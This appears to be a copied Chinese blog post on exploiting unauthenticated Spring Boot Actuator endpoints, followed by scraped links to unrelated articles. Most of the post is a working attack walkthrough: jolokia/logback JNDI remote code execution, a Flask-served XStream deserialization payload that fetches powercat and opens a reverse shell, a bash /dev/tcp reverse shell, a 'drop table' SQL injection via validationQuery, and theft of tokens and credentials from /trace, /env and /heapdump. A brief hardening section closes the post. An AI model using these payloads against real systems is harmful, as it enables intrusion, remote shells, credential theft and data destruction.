copy 子杰的哈,懒的写了

0x01 

未授权访问可以理解为需要授权才可以访问的页面由于错误的配置等其他原因,导致其他用户可以直接访问,从而引发各种敏感信息泄露。

0x02 Spring Boot Actuator未授权访问

/dump - 显示线程转储(包括堆栈跟踪)

/autoconfig - 显示自动配置报告

/configprops - 显示配置属性

/trace - 显示最后几条HTTP消息(可能包含会话标识符)

/logfile - 输出日志文件的内容

/shutdown - 关闭应用程序

/info - 显示应用信息

/metrics - 显示当前应用的’指标’信息

/health - 显示应用程序的健康指标

/beans - 显示Spring Beans的完整列表

/mappings - 显示所有MVC控制器映射

/env - 提供对配置环境的访问

/restart - 重新启动应用程序

当 web 应用程序出现 4xx、5xx 错误时显示类似以下页面就能确定当前 web 应用是使用了 springboot 框架。

1)通过'/ jolokia'执行远程代码

前置条件:
在jolokia/list目录检索存在logback组件,则可以使用jolokia远程包含logback.xml配置文件,直接执行远程引用字节码:
http://127.0.0.1:9090/jolokia/list

 

1.在VPS上创建logback.xml,logback中填写jndi服务,当调用时直接触发恶意class。

<configuration>

  <insertFromJNDI env-entry-name="ldap://vps_ip:1389/jndi" as="appName" />

</configuration>

2.创建反弹shell的恶意class,并监听端口8081
javac Exploit.java -> Exploit.class

3.利用marshalsec创建jndi server地址指向恶意class监听的端口8081:

4.监听反弹shell端口:

5.访问springboot以下链接触发远程访问VPS地址logback.xml:
http://127.0.0.1:9090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/VPS地址:8080!/logback.xml
触发回显2333端口接收到主机whomai结果:

 2 Config modification via '/env'

当第一种找不到logback配置可以尝试修改env配置文件进行xstream反序列化
前置条件:Eureka-Client <1.8.7(多见于Spring Cloud Netflix)
比如测试前台json报错泄露包名就是使用netflix:

需要以下2个包

spring-boot-starter-actuator(/refresh刷新配置需要)

spring-cloud-starter-netflix-eureka-client(功能依赖)

1.在VPS创建xstream文件,使用flask返回application/xml格式数据:

# linux反弹shell bash -i >&amp; /dev/tcp/192.168.20.82/9999 0>&amp;1

# windows反弹shell

# <string>powershell</string>

# <string>IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');</string>

# <string>powercat -c 192.168.123.1 -p 2333 -e cmd</string>

from flask import Flask, Response

app = Flask(__name__)

@app.route('/xstream', defaults={'path': ''})

@app.route('/xstream/<path:path>')

def catch_all(path):

    xml = """<linked-hash-set>

  <jdk.nashorn.internal.objects.NativeString>

    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">

      <dataHandler>

        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">

          <is class="javax.crypto.CipherInputStream">

            <cipher class="javax.crypto.NullCipher">

              <serviceIterator class="javax.imageio.spi.FilterIterator">

                <iter class="javax.imageio.spi.FilterIterator">

                  <iter class="java.util.Collections$EmptyIterator"/>

                  <next class="java.lang.ProcessBuilder">

                    <command>

                    <string>powershell</string>

                    <string>IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');</string>

                      <string>powercat -c [vps地址] -p 2333 -e cmd</string>

                    </command>

                    <redirectErrorStream>false</redirectErrorStream>

                  </next>

                </iter>

                <filter class="javax.imageio.ImageIO$ContainsFilter">

                  <method>

                    <class>java.lang.ProcessBuilder</class>

                    <name>start</name>

                    <parameter-types/>

                  </method>

                  <name>foo</name>

                </filter>

                <next class="string">foo</next>

              </serviceIterator>

              <lock/>

            </cipher>

            <input class="java.lang.ProcessBuilder$NullInputStream"/>

            <ibuffer></ibuffer>

          </is>

        </dataSource>

      </dataHandler>

    </value>

  </jdk.nashorn.internal.objects.NativeString>

</linked-hash-set>"""

    return Response(xml, mimetype='application/xml')

if __name__ == "__main__":

    app.run(host='172.31.245.127', port=2333)

2.启动服务:

 
python3 flask_xstream.py

3.写入配置:

POST /env HTTP/1.1

Host: 127.0.0.1:9090

Content-Type: application/x-www-form-urlencoded

Content-Length: 68

eureka.client.serviceUrl.defaultZone=http://vps:2333/xstream

刷新触发[POST]:
一般情况需要等待3秒会有响应包,如果立即返回可能是服务缺少spring-boot-starter-actuator扩展包无法刷新漏洞则无法利用

获取反弹shell:

2) 这个主要通过访问/trace 路径获取用户认证字段信息
可能会在其 trace 路径下,除了记录有基本的 HTTP 请求信息可能有包括用户 token、cookie 等字段:

3) 这个主要通过/env 路径获取这些服务的配置信息修改配置信息

运气好会有mysql、mangodb 的用户名及密码

如果Spring Cloud Libraries在类路径中,则'/ env'端点允许修改Spring环境属性。注释为“ @ConfigurationProperties”的所有bean 都可以修改和重新绑定。我们可以控制的许多(但不是全部)属性列在'/ configprops'执行器端点上。

spring.datasource.tomcat.validationQuery = drop + table + users - 允许任何SQL查询,它将自动对当前数据库执行。它可以是任何语句,包括插入,更新或删除。

4) git 项目地址泄露

这个一般是在/health 路径,比如如下站点,访问其 health 路径可探测到站点 git 项目地址:

5) 这个一般是在/heapdump 路径获取后台用户账号密码泄露
访问/heapdump 路径,返回 GZip 压缩 hprof 堆转储文件。在 Android studio 打开,会泄露站点内存信息,很多时候会包含后台用户的账号密码。

防范措施

如果上述请求接口不做任何安全限制,安全隐患显而易见。实际上Spring Boot也提供了安全限制功能。比如要禁用/env接口,则可设置如下:

endpoints.env.enabled= false

如果只想打开一两个接口,那就先禁用全部接口,然后启用需要的接口:

endpoints.enabled = false

endpoints.metrics.enabled = true

另外也可以引入spring-boot-starter-security依赖

<dependency>

            <groupId>org.springframework.boot</groupId>

            <artifactId>spring-boot-starter-security</artifactId>

</dependency>

在application.properties中指定actuator的端口以及开启security功能,配置访问权限验证,这时再访问actuator功能时就会弹出登录窗口,需要输入账号密码验证后才允许访问。

management.port=8099

management.security.enabled=true

security.user.name=admin

security.user.password=admin

Springboot之actuator未授权访问的更多相关文章

  1. Spring Boot Actuator未授权访问

    当我们发现某一个网页的logo是一篇叶子或者报错信息如下图所示的话,就可以尝试Spring Boot Actuator未授权访问. /dump - 显示线程转储(包括堆栈跟踪) /autoconfig ...

  2. mongodb未授权访问漏洞

    catalogue . mongodb安装 . 未授权访问漏洞 . 漏洞修复及加固 . 自动化检测点 1. mongodb安装 apt-get install mongodb 0x1: 创建数据库目录 ...

  3. Redis未授权访问漏洞分析

    catalog . Redis简介 . 漏洞概述 . 漏洞利用方式 . 修复方式 1. Redis简介 Relevant Link: http://www.cnblogs.com/LittleHann ...

  4. 【转+自己研究】新姿势之Docker Remote API未授权访问漏洞分析和利用

    0x00 概述 最近提交了一些关于 docker remote api 未授权访问导致代码泄露.获取服务器root权限的漏洞,造成的影响都比较严重,比如 新姿势之获取果壳全站代码和多台机器root权限 ...

  5. Zookeeper未授权访问

    l 漏洞名称: zookeeper未授权访问 l  漏洞影响版本: zookeeper l  漏洞细节: ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubb ...

  6. [ Redis ] Redis 未授权访问漏洞被利用,服务器登陆不上

    一.缘由: 突然有一天某台服务器远程登陆不上,试了好几个人的账号都行,顿时慌了,感觉服务器被黑.在终于找到一个还在登陆状态的同事后,经查看/ect/passwd 和/etc/passwd-异常,文件中 ...

  7. WordPress Backdoor未授权访问漏洞和信息泄露漏洞

    漏洞名称: WordPress Backdoor未授权访问漏洞和信息泄露漏洞 CNNVD编号: CNNVD-201312-497 发布时间: 2013-12-27 更新时间: 2013-12-27 危 ...

  8. Redis未授权访问缺陷让服务器沦为肉鸡

    朋友的一个项目说接到阿里云的告警,提示服务器已沦为肉鸡,网络带宽被大量占用,网站访问很慢,通过SSH远程管理服务器还频繁断开链接.朋友不知如何下手,便邀请我帮忙处理. 阿里云的安全告警邮件内容: 在没 ...

  9. 验证docker的Redis镜像也存在未授权访问漏洞

    看到了这篇老外的博客:Over 30% of Official Images in Docker Hub Contain High Priority Security Vulnerabilities于 ...

随机推荐

  1. zookeeper(分布式协调框架)简介与集群搭建

    ZooKeeper 的由来: Zookeeper最早起源于雅虎研究院的一个研究小组.在当时,研究人员发现,在雅虎内部很多大型系统基本都需要依赖一个类似的系统来进行分布式协调,但是这些系统往往都存在分布 ...

  2. while持续输入的几种常用使用方法

    while(scanf("%d,&n")!=EOF) 如果n被成功读入,则返回值为1, 如果n未被成功读入,则返回值为0, 如果遇到错误或遇到end of file,返回值 ...

  3. angular前端框架简单小案例

    一.angular表达式 <head> <meta charset="UTF-8"> <title>Title</title> &l ...

  4. DVWA-反射型XSS

    0x01 XSS介绍 XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器 ...

  5. PHP EOF使用说明

    PHP EOF(heredoc) 使用说明 PHP EOF(heredoc)是一种在命令行shell(如sh.csh.ksh.bash.PowerShell和zsh)和程序语言(像Perl.PHP.P ...

  6. 萌新学习SpringMVC

    前言 只有光头才能变强. 文本已收录至我的GitHub精选文章,欢迎Star:https://github.com/ZhongFuCheng3y/3y 这篇SpringMVC被催了很久了,这阵子由于做 ...

  7. influxes 基本概念

    Influxes 基本概念 1.安装 两种,虚机的话直接下载二进制文件起就好了,容器也很方便,存储挂载到/var/lib/influxdb 起就ok,配置文件可以通过configmap挂载进去. 2. ...

  8. npm加载包报错 :syscall access

    $ npm install --save-dev babel-plugin-syntax-dynamic-import npm WARN checkPermissions Missing write ...

  9. React:List and key

    在React中,可以通过数组方法返回一组 组件元素,并将该数组作为render()的js插值. function NumberList(props) { const numbers = props.n ...

  10. MySQL表的CRUD及多表查询

    数据库表的增删改查操作: 增.删.改 查: 单表查询 简单查询.where约束.group by分组.聚合查询.having过滤.order by排序.limit限制.正则匹配 多表查询 连表查询:交 ...